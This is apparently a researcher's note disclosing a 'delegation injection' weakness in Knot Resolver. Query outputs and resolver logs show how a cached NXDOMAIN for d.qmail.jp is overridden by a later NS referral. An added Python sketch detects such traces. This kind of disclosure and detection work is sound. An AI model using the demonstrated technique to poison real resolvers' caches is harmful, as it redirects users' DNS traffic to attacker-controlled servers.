Describe DNS/KnotResolver/d.qmail.jp/3 here.
Unfortunately, "delegation injection" is not prevented.
When d.qmail.jp is empty:
$ kdig -t a xxxx.d.qmail.jp @127.0.0.3
;; ->>HEADER<<- opcode: QUERY; status: NXDOMAIN; id: 8907
;; Flags: qr rd ra; QUERY: 1; ANSWER: 0; AUTHORITY: 1; ADDITIONAL: 0
;; QUESTION SECTION:
;; xxxx.d.qmail.jp. IN A
;; AUTHORITY SECTION:
qmail.jp. 2505 IN SOA f.ns.qmail.jp. hostmaster.m.qmail.jp. 1445682184 16384 2048 1048576 2560
;; Received 87 B
;; Time 2015-10-24 19:24:27 JST
;; From 127.0.0.3@53(UDP) in 0.2 ms
With this answer in the cache, we send a query.
In place of the poison, an NS record for d.qmail.jp is set up.
$ dnsq a xxxx.d.qmail.jp 14.192.44.5
1 xxxx.d.qmail.jp:
68 bytes, 1+0+1+1 records, response, noerror
query: 1 xxxx.d.qmail.jp
authority: d.qmail.jp 259200 NS a.ns.d.qmail.jp
additional: a.ns.d.qmail.jp 259200 A 14.192.44.29
$ kdig -t a xxxx.d.qmail.jp @127.0.0.3
;; ->>HEADER<<- opcode: QUERY; status: NXDOMAIN; id: 8907
;; Flags: qr rd ra; QUERY: 1; ANSWER: 0; AUTHORITY: 1; ADDITIONAL: 0
;; QUESTION SECTION:
;; xxxx.d.qmail.jp. IN A
;; AUTHORITY SECTION:
qmail.jp. 2505 IN SOA f.ns.qmail.jp. hostmaster.m.qmail.jp. 1445682184 16384 2048 1048576 2560
;; Received 87 B
;; Time 2015-10-24 19:24:27 JST
;; From 127.0.0.3@53(UDP) in 0.2 ms
This is a reply from the cache. The attack follows.
$ kdig -t a yyyyy.d.qmail.jp @127.0.0.3
;; ->>HEADER<<- opcode: QUERY; status: NXDOMAIN; id: 206
;; Flags: qr rd ra; QUERY: 1; ANSWER: 0; AUTHORITY: 1; ADDITIONAL: 0
;; QUESTION SECTION:
;; yyyyy.d.qmail.jp. IN A
;; AUTHORITY SECTION:
d.qmail.jp. 2560 IN SOA a.ns.d.qmail.jp. hostmaster.d.qmail.jp. 1444734355 16384 2048 1048576 2560
;; Received 86 B
;; Time 2015-10-24 19:25:01 JST
;; From 127.0.0.3@53(UDP) in 116.4 ms
1. log
[plan] plan 'xxxx.d.qmail.jp.' type 'A'
[resl] => root priming query
[plan] plan '.' type 'NS'
[resl] => querying: '192.36.148.17' score: 10 zone cut: '.' m12n: '.' type: 'NS'
[iter] <= rcode: NOERROR
[resl] => querying: '202.12.27.33' score: 10 zone cut: '.' m12n: 'JP.' type: 'NS'
[iter] <= referral response, follow
[resl] => querying: '192.50.43.53' score: 10 zone cut: 'jp.' m12n: 'qMAIL.JP.' type: 'NS'
[iter] <= referral response, follow
[resl] => querying: '14.192.44.5' score: 10 zone cut: 'qmail.jp.' m12n: 'D.QMail.Jp.' type: 'NS'
[iter] <= rcode: NXDOMAIN
[iter] <= found cut, retrying with non-minimized name
[ pc ] => answer cached for TTL=900
[resl] => querying: '14.192.44.5' score: 58 zone cut: 'qmail.jp.' m12n: 'XXxx.d.QMAiL.jp.' type: 'A'
[iter] <= rcode: NXDOMAIN
[ pc ] => answer cached for TTL=900
[resl] finished: 4, queries: 2, mempool: 16392 B
[plan] plan 'd.qmail.jp.' type 'NS'
[ pc ] => satisfied from cache
[iter] <= rcode: NXDOMAIN
[resl] finished: 4, queries: 1, mempool: 16392 B
[plan] plan 'xxxx.d.qmail.jp.' type 'A'
[ pc ] => satisfied from cache
[iter] <= rcode: NXDOMAIN
[resl] finished: 4, queries: 1, mempool: 16392 B
then query yyyy.d.qmail.jp (usually NXDOMAIN)
- (but we can poison d.qmail.jp NS [referral] as qmail.jp)
[plan] plan 'yyyyy.d.qmail.jp.' type 'A'
[resl] => querying: '14.192.44.5' score: 58 zone cut: 'qmail.jp.' m12n: 'YYYyy.d.QMaiL.jp.' type: 'A'
[iter] <= referral response, follow
[resl] => querying: '14.192.44.29' score: 10 zone cut: 'd.qmail.jp.' m12n: 'YYYyy.D.qMAIl.jP.' type: 'A'
[iter] <= rcode: NXDOMAIN
[ pc ] => answer cached for TTL=900
[resl] finished: 4, queries: 1, mempool: 16392 B
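
A detection sketch for the trace above, added here as an example (it is not part of the original page or of Knot Resolver): it scans verbose resolver log lines in the format shown on this page and reports any query sent to a zone cut at or below a name that an upstream server had already answered with NXDOMAIN. The function names are hypothetical, and the check ignores negative-cache TTL expiry because this log format carries no timestamps.

```python
import re

# Lines copied from the resolver trace on this page, trimmed to the relevant ones.
SAMPLE_LOG = """\
[resl] => querying: '14.192.44.5' score: 10 zone cut: 'qmail.jp.' m12n: 'D.QMail.Jp.' type: 'NS'
[iter] <= rcode: NXDOMAIN
[resl] => querying: '14.192.44.5' score: 58 zone cut: 'qmail.jp.' m12n: 'XXxx.d.QMAiL.jp.' type: 'A'
[iter] <= rcode: NXDOMAIN
[plan] plan 'yyyyy.d.qmail.jp.' type 'A'
[resl] => querying: '14.192.44.5' score: 58 zone cut: 'qmail.jp.' m12n: 'YYYyy.d.QMaiL.jp.' type: 'A'
[iter] <= referral response, follow
[resl] => querying: '14.192.44.29' score: 10 zone cut: 'd.qmail.jp.' m12n: 'YYYyy.D.qMAIl.jP.' type: 'A'
[iter] <= rcode: NXDOMAIN
""".splitlines()

QUERY_RE = re.compile(r"querying: '([^']+)'.*zone cut: '([^']+)' m12n: '([^']+)'")

def norm(name):
    """Lower-case (undo 0x20 case randomisation) and ensure a trailing dot."""
    return name.lower().rstrip(".") + "."

def find_cuts_below_nxdomain(lines):
    """Return (server, zone_cut, nxdomain_name) for each upstream query whose
    zone cut is at or below a name already answered with NXDOMAIN."""
    nxdomain = set()    # names an upstream server said do not exist
    last_qname = None   # name of the most recent upstream query
    hits = []
    for line in lines:
        m = QUERY_RE.search(line)
        if m:
            server, cut = m.group(1), norm(m.group(2))
            last_qname = norm(m.group(3))
            for name in sorted(nxdomain):
                if cut == name or cut.endswith("." + name):
                    hits.append((server, cut, name))
        elif line.startswith("[plan]"):
            last_qname = None   # new request: a cached rcode has no upstream query
        elif "rcode: NXDOMAIN" in line and last_qname:
            nxdomain.add(last_qname)
    return hits

if __name__ == "__main__":
    for server, cut, name in find_cuts_below_nxdomain(SAMPLE_LOG):
        print(f"query to {server}: zone cut {cut} contradicts earlier NXDOMAIN for {name}")
```

A delegation that was legitimately created after the NXDOMAIN was observed triggers the same report, so a hit is a reason to compare the referral against the parent zone, not proof of injection.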